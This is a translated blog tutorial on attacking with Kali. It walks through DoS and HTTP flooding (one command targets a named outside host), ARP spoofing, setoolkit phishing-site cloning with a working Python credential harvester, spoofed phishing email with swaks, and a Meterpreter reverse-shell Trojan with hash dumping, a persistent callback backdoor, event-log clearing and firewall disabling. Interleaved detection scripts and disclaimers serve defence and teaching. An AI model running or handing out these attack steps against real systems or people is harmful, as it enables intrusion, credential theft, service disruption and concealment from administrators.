Common attack methods in Kali

Note: this is for tutorials and general education only. Do not do anything illegal; you alone are responsible for the consequences.

1 Network attack methods

Use the DDoS and CC attack tools only against systems you own or are authorized to test. Using them in violation of local laws and regulations is at your own risk.

  • Before using kali, you need to be able to access the Internet.
    Reference: kali installation

1.1 DDoS attack

  1. Open a terminal and clone the repository containing the DDoS script
git clone https://github.com/Andysun06/ddos
  2. Enter the cloned directory (the name is case sensitive)
cd ddos
  3. Run the script
    The Kali used for the demonstration in this article is the 2020 release. Run ddos-p2.py with Python:
python ddos-p2.py
    (On recent Kali releases `python` is Python 3; check which interpreter the script expects before running it.)

The script then shows a menu and asks for the IP of the target (this tutorial uses my own website as the example).

To turn a domain name into an IP, open another terminal window:

ping <domain>
# the reply shows the resolved IP

  4. Configure the parameters

  • ip: the target address
  • Attack Port: the target port. Web servers usually listen on 80 (search for the default port of other services)
  • Attack Speed: the larger the value, the faster packets are sent; the script caps it at 1000.
  5. Launch the attack

Press Enter; the script starts flooding the target and its terminal output confirms that the attack is running. Note that a single Kali VM produces a plain DoS, not a distributed one; the "D" in DDoS comes from many sources sending at once.

1.2 CC attack

  • A type of DDoS attack
  • A CC (Challenge Collapsar) attack is an application-layer DDoS attack that uses proxy servers, or simply many concurrent connections, to send a large number of seemingly legitimate HTTP requests to the victim server.
  1. Open a terminal as root
  2. Enter the command
ab -n <total requests> -c <concurrency> <site URL>

-n is the total number of requests to send and -c is the number of concurrent requests (simulated users). Note the order: it is easy to mix the two up (run ab -h for the remaining options).
Both numbers and the URL are chosen by yourself. In this example they are 1000, 1000 and http://bjvcrrn.nat.ipyingshe.com/bbs/:

ab -n 1000 -c 1000 http://bjvcrrn.nat.ipyingshe.com/bbs/

When ab prints its summary (requests per second, failed requests, time per request) the run has completed.

Difference between DDoS and CC attacks:
1. CC attacks (low traffic, real source IPs)
are usually application-layer attacks. The target is a web page and the protocols involved are mainly HTTP and HTTPS. They exhaust the server's CPU and back-end resources by requesting expensive operations such as database queries.
2. DDoS attacks (high traffic, forged source IPs)
usually work at the network and transport layers. The target is an IP address, the protocols involved are mainly IP, UDP and TCP, and they usually exhaust network bandwidth.
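The distinction above has a practical consequence for the defender: a CC flood comes from real addresses and lands in the web server's access log, so it can be spotted there, whereas a spoofed volumetric flood never reaches the application log. The following Python script is an added example (not part of the original tutorial) that parses constructed Apache/Nginx combined-format log lines and flags any source IP whose request rate inside a sliding window exceeds a threshold; the window of 10 seconds, the limit of 50 requests and the sample IPs are assumptions.

```python
"""Spot a CC-style (application-layer) flood in web server access logs.

Added example, not part of the original tutorial. It parses lines in the
Apache/Nginx "combined" log format and flags any source IP whose request
rate inside a sliding time window exceeds a threshold. The sample lines,
the 10 s window and the 50-request limit are constructed values.
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m.group("ip"),
        "ts": datetime.strptime(m.group("ts"), TS_FMT),
        "method": m.group("method"),
        "path": m.group("path"),
        "status": int(m.group("status")),
    }


def find_flooders(lines, window_s=10, max_requests=50):
    """Map each offending IP to its peak request count in any window_s-second window.

    A CC attack comes from real (non-spoofed) addresses, so a per-IP rate is a
    usable signal here; a volumetric DDoS with forged sources would never
    show up in the application log at all.
    """
    recent = defaultdict(deque)   # ip -> timestamps inside the current window
    peak = defaultdict(int)
    for rec in filter(None, map(parse_line, lines)):
        q = recent[rec["ip"]]
        q.append(rec["ts"])
        while (rec["ts"] - q[0]).total_seconds() > window_s:
            q.popleft()
        peak[rec["ip"]] = max(peak[rec["ip"]], len(q))
    return {ip: n for ip, n in peak.items() if n > max_requests}


def sample_log():
    """Constructed log: one client hammering an expensive search page, two normal visitors."""
    t0 = datetime(2024, 1, 1, 12, 0, 0, tzinfo=timezone(timedelta(hours=8)))

    def line(ip, t, path):
        return (f'{ip} - - [{t.strftime(TS_FMT)}] "GET {path} HTTP/1.1" '
                f'200 5123 "-" "Mozilla/5.0"')

    lines = [line("203.0.113.7", t0 + timedelta(milliseconds=50 * i), "/bbs/search.php?q=a")
             for i in range(120)]                      # 120 requests in 6 seconds
    lines += [line("198.51.100.23", t0 + timedelta(seconds=7 * i), "/bbs/") for i in range(8)]
    lines += [line("192.0.2.9", t0 + timedelta(seconds=11 * i), "/bbs/index.php") for i in range(5)]
    return lines


if __name__ == "__main__":
    for ip, n in find_flooders(sample_log()).items():
        print(f"{ip}: {n} requests in 10 s, candidate for rate limiting or blocking")
```

On a real server feed the output of `tail -f access.log` into the same logic and pair it with a rate-limiting rule in the web server or firewall; the threshold must be tuned per site, since a legitimate page with many sub-resources can generate dozens of requests per visitor.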

1.3 ARP spoofing

ARP spoofing uses the dsniff package (arpspoof is one of the tools shipped with dsniff, so we need to install dsniff). The commands are as follows:

  1. Install dsniff
apt-get install dsniff -y
  2. Find the network interface name and address
ifconfig

  3. Discover devices on the LAN

To find the IP addresses of all live hosts on your LAN, the command is:

fping -g <your IP address>/24

For example, my IP is 192.168.145.98, so the command is fping -g 192.168.145.98/24

My other device shows up here: 192.168.145.26, a PC running CentOS.

  4. Launch the attack

Before launching the attack, first check the network latency of the target host 192.168.145.26 (for example with ping).

Result: the round-trip time is roughly 50 ms.

Enter the command to launch the attack:

arpspoof -i <your interface name> -t <target IP address> <target's gateway address>

Finding the interface name was covered above; mine is eth0. The target is my other PC, IP 192.168.145.26.

Because I am using a virtual machine and the gateway configured on my PC is 192.168.145.2, my attack command is as follows (on most networks the gateway is xxx.xxx.xxx.1, i.e. the last octet set to 1, but check the target's routing table rather than guessing):

arpspoof -i eth0 -t 192.168.145.26 192.168.145.2

Press Enter to launch the attack. arpspoof prints a line for every forged ARP reply it sends (claiming that 192.168.145.2 is-at Kali's MAC address), which shows that the attack is running.

  5. Check the effect
    Now my other PC is basically unable to reach the Internet, which shows that the ARP spoofing worked: the target sends all gateway-bound traffic to Kali's MAC address, and Kali does not forward it. If you want to intercept the traffic instead of cutting it, enable IP forwarding on Kali (the net.ipv4.ip_forward sysctl) and run a second arpspoof in the opposite direction (-t gateway, target) so that both halves of the conversation pass through Kali.
    To stop the attack press Ctrl+C: on exit arpspoof sends corrective ARP replies carrying the gateway's real MAC so the target recovers. Ctrl+Z only suspends the process and leaves the poisoned cache entries in place.
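What the victim sees during the attack is its ARP cache changing: the gateway's entry suddenly carries Kali's MAC, and one MAC now answers for two IPs. The following Python script is an added example (not part of the original tutorial) that parses two constructed snapshots of `ip neigh show` output taken on the victim before and during the attack and reports exactly those two symptoms; the interface name and MAC addresses in the snapshots are assumptions.

```python
"""Detect ARP spoofing from snapshots of the ARP cache.

Added example, not part of the original tutorial. It parses the output of
`ip neigh show` (Linux) taken on the victim before and during the attack
and reports when the MAC recorded for the gateway changes, or when a single
MAC answers for several IPs, which is exactly what arpspoof causes. The two
snapshots and their MAC addresses are constructed.
"""
import re

NEIGH_RE = re.compile(
    r"^(?P<ip>\d+\.\d+\.\d+\.\d+)\s+dev\s+(?P<dev>\S+)\s+lladdr\s+"
    r"(?P<mac>(?:[0-9a-f]{2}:){5}[0-9a-f]{2})\s+(?P<state>\S+)$",
    re.IGNORECASE,
)


def parse_neigh(text):
    """Return {ip: mac} for the entries of an `ip neigh show` dump."""
    table = {}
    for line in text.strip().splitlines():
        m = NEIGH_RE.match(line.strip())
        if m and m.group("state").upper() != "FAILED":
            table[m.group("ip")] = m.group("mac").lower()
    return table


def arp_alerts(baseline, current, gateway_ip):
    """Compare two {ip: mac} tables; return human-readable alerts (empty list = clean)."""
    alerts = []
    old, new = baseline.get(gateway_ip), current.get(gateway_ip)
    if old and new and old != new:
        alerts.append(f"gateway {gateway_ip} MAC changed {old} -> {new}")
    by_mac = {}
    for ip, mac in current.items():
        by_mac.setdefault(mac, []).append(ip)
    for mac, ips in by_mac.items():
        if len(ips) > 1:   # one MAC claiming the gateway and itself: arpspoof's signature
            alerts.append(f"{mac} claims {sorted(ips)}")
    return alerts


# Constructed snapshots taken on the victim 192.168.145.26 (interface name assumed).
# 00:50:56:ea:10:01 stands in for the real gateway, 00:0c:29:4a:2b:3c for the Kali VM.
BEFORE = """\
192.168.145.2 dev ens33 lladdr 00:50:56:ea:10:01 REACHABLE
192.168.145.98 dev ens33 lladdr 00:0c:29:4a:2b:3c STALE
"""
DURING = """\
192.168.145.2 dev ens33 lladdr 00:0c:29:4a:2b:3c REACHABLE
192.168.145.98 dev ens33 lladdr 00:0c:29:4a:2b:3c STALE
"""


def demo():
    return arp_alerts(parse_neigh(BEFORE), parse_neigh(DURING), "192.168.145.2")


if __name__ == "__main__":
    for a in demo():
        print("ALERT:", a)
```

Run `ip neigh show` from a cron job or a loop and feed consecutive dumps to arp_alerts; on the Kali side the same script shows nothing unusual, because it is the victim's cache that is poisoned. A static ARP entry for the gateway on the victim makes the poisoning fail outright.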

2 Social engineering attacks (setoolkit)

2.1 Build a phishing website

Phishing websites are a common way for attackers to steal usernames and passwords. Here we mainly introduce how to use setoolkit to create a phishing website.

setoolkit (the Social-Engineer Toolkit, SET) is a social engineering toolset shipped with Kali.

① Start setoolkit

Enter on the command line:

setoolkit

② Choose Social-Engineering Attacks > Website Attack Vectors > Credential Harvester

The main menu offers:

1) Social-Engineering Attacks
2) Penetration Testing (Fast-Track)
3) Third Party Modules
4) Update the Social-Engineer Toolkit
5) Update SET configuration
6) Help, Credits, and About

  • Select 1 (Social-Engineering Attacks) to reach the next menu:

1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) Wireless Access Point Attack Vector
8) QRCode Generator Attack Vector
9) Powershell Attack Vectors
10) Third Party Modules

  • Enter 2 (Website Attack Vectors) to reach the next menu:

1) Java Applet Attack Method
2) Metasploit Browser Exploit Method
3) Credential Harvester Attack Method
4) Tabnabbing Attack Method
5) Web Jacking Attack Method
6) Multi-Attack Web Method
7) Full Screen Attack Method

  • Select 3 (Credential Harvester Attack Method); SET then asks how the phishing page should be built:

1) Web Templates
2) Site Cloner
3) Custom Import

If you choose Web Templates, SET provides several built-in login page templates.

If you want to clone a specific page, choose 2 Site Cloner. Although this function is powerful, some websites cannot be cloned; if cloning fails, choose 3 Custom Import and build an identical copy of the site yourself for phishing. Site cloning is described in detail below.

Login page templates:

  • Choose Web Templates and enter 2 to select the Google login template.
  • Kali then listens on port 80 and prints every form submission to the terminal.

③ Site cloning

After selecting 2 (Site Cloner) we need to enter some information:

  • First the IP address the cloned page will POST the form back to. Generally this is the IP address of the Kali virtual machine (mine is 192.168.145.98).
  • Then the URL of the website we want to clone.

After pressing Enter, SET reports that cloning has finished and starts the listener.

④ Kali obtains the username and password

We set both the username and password to admin and clicked Log in. The browser was redirected to the real page instead of showing an error about wrong credentials, and at the same time Kali captured the submitted fields and displayed them in the terminal.

⑤ Combine with an intranet tunnelling service for public-network access

This time I used the DVWA login page for the test.
Choice of tunnelling tool: 花生壳 (Oray Peanut Shell).

  • Download the client from the Peanut Shell official website and install it

    • Add a new mapping
    • Use HTTPS mapping (requires account verification)

    This service costs 6 yuan

    • Configure the mapping

    For the intranet host IP, just fill in Kali's IP.

So here we only need to fill in Kali's IP and port (80) to map it to the public network.

As mentioned before, the HTTP mapping is charged, 6 yuan, but it can be used for a long time, which I think is not expensive.

Now the last step: use Custom Import together with Peanut Shell to phish over the public network.

⑥ Public-network phishing

Note: this article is for learning purposes only; illegal use is strictly prohibited!

Materials:
1. DVWA:
Link: https://pan.baidu.com/s/1ketwjg_wm5DSvCFNb20K2A
Extraction code: sljb
  1. Drag the dvwa folder into the /root directory. If drag-and-drop into the VM does not work, look up how to copy files into the guest.
  2. Open setoolkit
① Open a terminal and enter setoolkit
② Select 1, Social-Engineering Attacks
③ Select 2, Website Attack Vectors
④ Select 3, Credential Harvester Attack Method
⑤ Select 3, Custom Import (accept the default IP by pressing Enter)
⑥ Enter the import path: /root/dvwa
⑦ Select 2, copy the entire folder
⑧ Configure the intranet tunnel
⑨ Visit the mapped domain name and check Kali's listener output

After selecting 3 (Custom Import) a prompt for the IP appears; to keep the default just press Enter.
(If you choose to use a domain name instead, that domain must resolve to this host.) We press Enter to keep the default.

Next we choose 2 to import the entire folder.

  3. Configure the intranet tunnelling service
  4. Test the result

Enter the URL in a browser: https://****.****.fun/

⑦ The complete sequence of commands for cloning a website

To phish over the public network, just follow these steps:

1. setoolkit
2. Enter 1
3. Enter 2
4. Enter 3
5. Enter 2
6. Enter the Kali VM's IP (or the IP of the Kali host you set up yourself)
7. Enter the URL of the site to clone
8. Visit the cloned site via Kali's IP
  • Original website and cloned website look identical in the browser.

As you can see, it is not difficult to create a phishing website, so whenever we log in somewhere we have an account, we must read the URL carefully to avoid being phished.
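To make clear why the victim "jumped to the real page" in step ④ while Kali still got the credentials, here is the mechanism behind SET's credential harvester reduced to its essentials. This is an added example, written for this page; it is neither the tutorial's code nor SET's own. It serves a constructed stand-in for the cloned page, records every POSTed field, and answers with a 302 to the genuine login page. REAL_SITE and the listen port are assumptions.

```python
"""Minimal credential harvester, to show what SET's Site Cloner sets up.

Added example; it is not the tutorial's code and not SET's own code. A
cloned login page (a constructed stand-in below) is served from Kali; its
form POSTs back to this server, which records the fields and then answers
with a 302 to the genuine login page, so the victim ends up on the real
site exactly as described in step ④. REAL_SITE and the listen port are
assumptions.
"""
import urllib.parse
from http.server import BaseHTTPRequestHandler, HTTPServer

REAL_SITE = "http://192.168.145.26/dvwa/login.php"   # assumed: where the victim is sent afterwards
CAPTURED = []                                         # equivalent of SET's harvester report

# Constructed stand-in for the cloned page; the form action points back at this server.
CLONE_HTML = b"""<html><body><h2>Login</h2>
<form method="post" action="/">
Username <input name="username"><br>
Password <input name="password" type="password"><br>
<input type="hidden" name="csrf_token" value="abc123">
<input type="submit" name="Login" value="Login">
</form></body></html>"""

CREDENTIAL_HINTS = ("user", "login", "mail", "pass", "pwd")


def harvest(body, real_site=REAL_SITE):
    """Parse a urlencoded form body, record the fields, return (fields, redirect target)."""
    fields = {k: v[0] for k, v in urllib.parse.parse_qs(body.decode(errors="replace")).items()}
    CAPTURED.append(fields)
    return fields, real_site


def interesting(fields):
    """Keep only fields whose name looks like account data, as SET highlights them."""
    return {k: v for k, v in fields.items() if any(h in k.lower() for h in CREDENTIAL_HINTS)}


class Harvester(BaseHTTPRequestHandler):
    def do_GET(self):
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.end_headers()
        self.wfile.write(CLONE_HTML)

    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        fields, target = harvest(self.rfile.read(length))
        print("[*] harvested:", interesting(fields))
        self.send_response(302)                  # victim lands on the real site, no error shown
        self.send_header("Location", target)
        self.end_headers()


if __name__ == "__main__":
    HTTPServer(("0.0.0.0", 80), Harvester).serve_forever()   # assumed port; needs root
```

The redirect is what keeps the victim from noticing: the real site shows its normal login page, and a second attempt there succeeds. From the user's side the only visible difference is the address bar, which is why the advice above is to read the URL.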

2.2 QR code

The QRCode Generator Attack Vector module in SET launches a QR code attack: the deceived user scans your QR code and lands on a disguised phishing website. Some people will think this is useless, but if you are handed a QR code or an unknown URL, which would you trust more? Usually the QR code, because its destination stays hidden until it is scanned.

The corresponding commands are:

1. setoolkit
2. Enter 1, Social-Engineering Attacks
3. Enter 8, QRCode Generator Attack Vector
4. Enter the target URL (using Hetian Lab as the example: www.hetianlab.com)

The QR code is written by default to: /root/.set/reports/

However, scanning it with WeChat on the phone does not open the website; you need to scan it with the mobile UC browser to be taken to the site.

SET's generator is therefore rather limited. I recommend an online QR code generator (草料 QR code generator) instead: it produces QR codes that open directly when scanned in WeChat and offers many styles, so you can do whatever you want.

Scanning a QR code generated that way with WeChat opens the site directly.

[Summary] The attack demonstrations above tell us several things:

  1. Do not casually open links to websites of unknown safety or scan unknown QR codes, and do not blindly enter your account, password or other sensitive information. The website you see may not be the real one (in practice attackers bind a public IP address and a look-alike public domain name to make the fake hard to distinguish from the real site);
  2. Also be careful not to connect to Wi-Fi of unknown safety: once you join a Wi-Fi set up by an attacker, the attacker can use DNS spoofing inside the LAN to redirect domains such as www.baidu.com to a phishing site of his choosing!

2.3 Phishing emails

Once an attacker has built a phishing website or a Trojan, he needs a way to deliver it to the victim, and a common delivery channel is email. Users with poor security awareness may be compromised if they click the phishing link in the email or download and run the Trojan attached to it!

Tool overview

Swaks is a "Swiss Army Knife" for SMTP: it can drive almost any part of the SMTP protocol, which makes it useful for mail-server testing as well as for forging emails, phishing and social-engineering exercises.

Basic usage of Swaks:

1. swaks --to [email protected] tests connectivity to the mailbox (swaks looks up the recipient domain's MX and tries to deliver a test message);

2. Parameter description (only a short list; see --help for the rest):

--from  [email protected]     // envelope sender (MAIL FROM), also used for the From: header by default
--ehlo   qq.com      // hostname presented in the HELO/EHLO command; it authenticates nothing, it is simply the name the sending host claims
--body  "http://www.baidu.com"    // the quoted text becomes the message body
--header  "Subject:hello"   // add a header; Subject is the mail title
--data   ./Desktop/email.txt    // send the contents of a file (headers and body) as the complete message, e.g. a saved copy of a legitimate email

Kali ships swaks; check the version with swaks --version

  1. Create a temporary mailbox to receive the email.
    Create an address at: https://www.linshi-email.com/

  2. Launch the attack

Forge an email from 360 HR to the recipient [email protected] with the content: "Congratulations on passing your 360 interview. Please click the link below to enter our employee information page. https://fishing.com/test.php", as follows:

swaks --to [email protected] --from [email protected] --ehlo baidu.cn --body "this is your Offer, please click on the link below to enter our employee information page. https://baidu.com"

  3. Check the temporary mailbox; the email has arrived.

How to read the swaks output:
"===": informational lines from swaks
"***": errors raised inside swaks
" ->": a line sent to the server (no error)
"<- ": the expected reply from the server (no error)
"<**": an error returned by the server

Extension: add an attachment with --attach

swaks --to [email protected] --from [email protected] --ehlo 360.cn --body "this is your offer.please open the attach" --attach offer.txt

offer.txt must exist in the current directory.

However, delivery to QQ Mail and NetEase mailboxes currently fails. This is due to the security mechanisms of Tencent and NetEase: a message injected straight into the MX with a forged sender fails the SPF, DKIM and DMARC checks of the From domain and is rejected or discarded. The practical lesson is to check the source (raw headers) of any suspicious email to see whether the sending IP and the authentication results are trustworthy; otherwise a careless click may get you phished or compromised!
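The advice to "check the source email" can be automated. The following Python script is an added example (not part of the tutorial, standard library only) that takes the sending IP and HELO name from the first Received hop, reads the receiving server's Authentication-Results header (SPF/DKIM/DMARC) and compares the HELO name with the From: domain. The two raw messages are constructed: FORGED mimics what the swaks command above produces, CLEAN mimics a legitimate message; all hostnames, IPs and addresses in them are assumptions.

```python
"""Check the headers of a received message for a forged sender.

Added example, not part of the tutorial; standard library only. It takes
the sending IP and HELO name from the first Received hop, reads the receiving
server's Authentication-Results (SPF/DKIM/DMARC) and compares the HELO name
with the From: domain. FORGED mimics the swaks message above, CLEAN a
legitimate one; hostnames, IPs and addresses are assumptions.
"""
import re
from email import policy, utils
from email.parser import BytesParser

HOP_RE = re.compile(r"from\s+(?P<helo>\S+)\s+\((?:(?P<rdns>[^\s\[\]]+)\s+)?\[(?P<ip>[\d.]+)\]\)")


def first_hop(msg):
    """The last Received: header is the first hop, i.e. the host that injected the mail."""
    hops = msg.get_all("Received") or []
    m = HOP_RE.search(str(hops[-1])) if hops else None
    return m.groupdict() if m else {}


def auth_results(msg):
    """Extract spf/dkim/dmarc verdicts from the Authentication-Results header."""
    ar = str(msg.get("Authentication-Results", ""))
    return dict(re.findall(r"\b(spf|dkim|dmarc)=(\w+)", ar))


def assess(raw):
    msg = BytesParser(policy=policy.default).parsebytes(raw)
    hop, auth = first_hop(msg), auth_results(msg)
    from_domain = utils.parseaddr(str(msg["From"]))[1].rpartition("@")[2].lower()
    helo = (hop.get("helo") or "").lower()
    reasons = []
    if auth.get("spf") != "pass":
        reasons.append(f"SPF {auth.get('spf', 'absent')} for {from_domain}")
    if auth.get("dmarc") != "pass":
        reasons.append(f"DMARC {auth.get('dmarc', 'absent')} for {from_domain}")
    if helo and from_domain and helo != from_domain and not helo.endswith("." + from_domain):
        reasons.append(f"HELO {helo} is not under the From domain {from_domain}")
    if hop and hop.get("rdns") in (None, "unknown"):
        reasons.append(f"no reverse DNS for sending IP {hop.get('ip')}")
    return {"origin_ip": hop.get("ip"), "helo": helo, "from_domain": from_domain,
            "auth": auth, "reasons": reasons, "suspicious": bool(reasons)}


# Constructed messages. FORGED: swaks-style injection with --ehlo qq.com and a fake From.
FORGED = b"""Received: from mx1.example.net (mx1.example.net [203.0.113.10])
\tby inbox.example.org with ESMTP id abc123; Mon, 1 Jan 2024 12:00:01 +0800
Received: from qq.com (unknown [198.51.100.44])
\tby mx1.example.net with ESMTP id def456; Mon, 1 Jan 2024 12:00:00 +0800
Authentication-Results: inbox.example.org; spf=fail smtp.mailfrom=corp.example; dkim=none; dmarc=fail header.from=corp.example
From: hr@corp.example
To: victim@example.org
Subject: this is your Offer
Date: Mon, 1 Jan 2024 12:00:00 +0800

please click on the link below to enter our employee information page.
"""

CLEAN = b"""Received: from mail.corp.example (mail.corp.example [203.0.113.5])
\tby inbox.example.org with ESMTPS id ghi789; Mon, 1 Jan 2024 12:05:00 +0800
Authentication-Results: inbox.example.org; spf=pass smtp.mailfrom=corp.example; dkim=pass header.d=corp.example; dmarc=pass header.from=corp.example
From: hr@corp.example
To: victim@example.org
Subject: interview schedule
Date: Mon, 1 Jan 2024 12:05:00 +0800

see attached.
"""

if __name__ == "__main__":
    for name, raw in (("FORGED", FORGED), ("CLEAN", CLEAN)):
        r = assess(raw)
        print(name, "from", r["origin_ip"], "suspicious" if r["suspicious"] else "ok", r["reasons"])
```

Only trust the Authentication-Results header added by your own receiving server (the one named in it): anything earlier in the chain, including Received lines, can be forged by the sender, which is why the script reads the hop list from the bottom and why a missing or failing SPF/DMARC verdict is the strongest signal.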

2.4 Remote Trojans

SET also integrates a payload generator that builds a Trojan and invokes the MSF framework to control the remote host.

2.4.1 Generate the Trojan and upload it to the target machine

1. setoolkit
2. Select 1, Social-Engineering Attacks
3. Select 4, Create a Payload and Listener
4. Select 2, Windows Reverse_TCP Meterpreter
5. Enter the IP address to listen on (Kali's IP) and a port (any port that is not in use)

The Trojan is saved by default under /root/.set/ (payload.exe).
Upload the Trojan to the target machine.

2.4.2 Execute the Trojan and control the host

Double-click the Trojan on the target and watch the listener in Kali: a new Meterpreter session opens.

Activate the Meterpreter session and obtain a shell to control the Win 7 target:

# interact with the first session in the list
sessions -i 1

  • Control the host

Enter help to see all the commands Meterpreter supports together with their descriptions.

Take a screenshot of the target's desktop with the screenshot command.

  • Run getsystem to escalate privileges
  • Get the passwords (Windows stores password hashes, not plaintext passwords, in the SAM database)

Run the hashdump command to dump the hashes of all local accounts. If it fails, that is usually a privilege problem: escalate with getsystem first, then use the script version, run hashdump, which is listed again under the common commands below.

  • Remote desktop view of Win 7
run vnc

For further work, background sends the current session to the background so other modules can be run, and sessions -i brings it back. migrate <pid> moves the session into another process so that the process hosting the session is hidden and the session no longer depends on the original payload.exe process (use ps to list the victim's processes and pick a suitable pid).

2.4.3 Log clearing

To avoid leaving traces of the attacker's activity, the system event logs need to be cleared.

  1. First open the Windows Event Viewer and look at the log records before clearing.
Win + R, enter: eventvwr

  2. Run the clearev command in Meterpreter to clear the target's logs.

The drawback of this command is that it cannot clear selected entries. Wiping everything at once easily draws the system administrator's attention, and the clearing itself is logged: the Security log records Event ID 1102, "The audit log was cleared".

Note: if you accidentally suspend the console with Ctrl+Z, restore it with the following commands:

# jobs lists the suspended jobs and their numbers
jobs

# bring the job back to the foreground
fg %<jobnumber>   (the job number shown by jobs, not the process id)

If you accidentally exit the msf session, reopen setoolkit and set the same IP and port to start listening again.

2.4.4 Creating backdoors

After gaining access to the target, we need a way to regain the connection without having to compromise the system again. If the target user breaks the connection, for example by rebooting, a backdoor re-establishes the connection to the target automatically. For the convenience of later penetration, create a backdoor so that the work is not interrupted when the connection drops.

  1. Before creating a persistent backdoor, check its help:
run persistence -h

  2. Run the command to create the persistent backdoor. The output shows the process: Kali writes a persistence script into the target system
(saved at C:\Users\thinkpad\AppData\Local\Temp\naBffRVEO.vbs) and adds a registry entry that starts it:

run persistence -X -i 5 -p 9000 -r 192.168.145.98
# -X: start when the system boots (Run key), -i 5: reconnect every 5 seconds,
# -p 9000 / -r 192.168.145.98: port and IP of the Kali listener

  3. Check the registry and the file system of the Win 7 target

  4. To verify that the backdoor works, close the current session and reboot the Win 7 VM

Now open a new terminal in Kali, run the MSF framework with a handler on the same port, and watch whether the Win 7 machine reconnects on its own after the reboot. When a session appears, the backdoor has been implanted successfully! From then on, whenever the Win 7 system boots, the backdoor script runs automatically and the attacker can connect at any time, unless the administrator of the victim host finds and deletes the corresponding registry value and the implanted script. Deleting the original Trojan file payload.exe no longer matters, because the persistence script runs independently of it.
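The two artefacts this chain leaves behind, the autostart registry value pointing at a script in a temp directory (2.4.4) and the "log cleared" events written when clearev runs (2.4.3), are also what an administrator should look for. The following Python script is an added example (not from the tutorial) with one check for each: it parses constructed `reg query ...\Run` text output and constructed exported event records; the value names, paths and timestamps in the samples are assumptions.

```python
"""Two checks for the traces left by the attack chain in 2.4.3 and 2.4.4.

Added example, not from the tutorial. check_run_keys() parses the text
output of `reg query ...\\Run` and flags autostart entries that launch a
script or run from a user-writable temp directory, which is what
`run persistence -X` leaves behind. cleared_log_events() scans exported
Windows events for ID 1102 (Security) and 104 (System), which Windows
writes when a log is cleared, e.g. by Meterpreter's clearev. Both inputs
below are constructed samples.
"""
import re

VALUE_RE = re.compile(r"^\s+(?P<name>.+?)\s{2,}(?P<type>REG_\w+)\s{2,}(?P<data>.+?)\s*$")
SCRIPT_EXT = (".vbs", ".js", ".ps1", ".bat", ".cmd", ".hta")
TEMP_DIRS = ("\\temp\\", "\\users\\public\\")


def check_run_keys(reg_output):
    """Return [(key, value name, launched path, reason)] for suspicious autostart entries."""
    findings, key = [], None
    for line in reg_output.splitlines():
        if line.startswith("HKEY_"):
            key = line.strip()
            continue
        m = VALUE_RE.match(line)
        if not m:
            continue
        target = re.match(r'"([^"]+)"|(\S+)', m.group("data"))   # first token, quoted or not
        path = (target.group(1) or target.group(2)).lower()
        reasons = []
        if path.endswith(SCRIPT_EXT):
            reasons.append("autostart runs a script")
        if any(d in path for d in TEMP_DIRS):
            reasons.append("launched from a user-writable temp location")
        if reasons:
            findings.append((key, m.group("name"), path, "; ".join(reasons)))
    return findings


def cleared_log_events(csv_text):
    """Return (timestamp, log, event id) for events that record a log being cleared."""
    hits = []
    for line in csv_text.splitlines():
        if not line.strip():
            continue
        ts, log, eid, _msg = line.split(",", 3)
        if (log, int(eid)) in {("Security", 1102), ("System", 104)}:
            hits.append((ts, log, int(eid)))
    return hits


# Constructed `reg query` output: VMware Tools and OneDrive are normal, the VBS in Temp is not.
REG_SAMPLE = """
HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run
    VMware User Process    REG_SZ    "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe" -n vmusr
    naBffRVEO    REG_SZ    C:\\Users\\thinkpad\\AppData\\Local\\Temp\\naBffRVEO.vbs

HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run
    OneDrive    REG_SZ    "C:\\Users\\thinkpad\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe" /background
"""

# Constructed event export (time, log, event id, message), as a CSV from Event Viewer.
EVENTS_SAMPLE = """\
2024-01-01 12:00:01,Security,4624,An account was successfully logged on.
2024-01-01 12:00:05,Security,4672,Special privileges assigned to new logon.
2024-01-01 12:01:10,Security,1102,The audit log was cleared.
2024-01-01 12:01:10,System,104,The System log file was cleared.
2024-01-01 12:01:12,System,7036,The VMware Tools service entered the running state.
"""

if __name__ == "__main__":
    for key, name, path, why in check_run_keys(REG_SAMPLE):
        print(f"[autostart] {key}\\{name} -> {path} ({why})")
    for ts, log, eid in cleared_log_events(EVENTS_SAMPLE):
        print(f"[log cleared] {ts} {log} event {eid}")
```

Event 1102 survives clearev because it is written after the Security log is emptied; forwarding logs to a collector before the attacker reaches the machine is the only way to keep what was deleted.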

2.4.5 Common commands

Start the VNC desktop viewer: run vnc

Dump password hashes: run hashdump

List a directory: ls

Put the session in the background: background

Time the remote user has been idle: idletime

Current user: getuid

Privileges of the current user: getprivs

PID of the current process: getpid

Target system information: sysinfo

Running processes: ps

Search, download and upload files (SYSTEM privileges are needed for protected locations; escalate with getsystem or an exploit such as MS16-032)
    (1) search the C: drive for all files with the txt extension: search -f *.txt -d c:\
    (2) download a file to Kali: download c:\1.txt /root
    (3) upload a file to Win 7: upload /home/zidian/msfadmin.txt c:\

Reboot / shut down the target: reboot / shutdown

Enter a cmd shell: shell

Common commands once in cmd:

Current user: whoami

Add a user with a password: net user [username] [password] /add

Detailed information about the computer: systeminfo

Turn off the firewall: netsh advfirewall set allprofiles state off

Network connections of the computer: netstat -ano

Common msf commands

Reference: https://cloud.tencent.com/developer/article/1808932
https://www.freebuf.com/articles/network/317596.html

Reference article:
https://blog.csdn.net/a_n_d_y_s_u_n__/article/details/118528019

Origin blog.csdn.net/weixin_45565886/article/details/128911366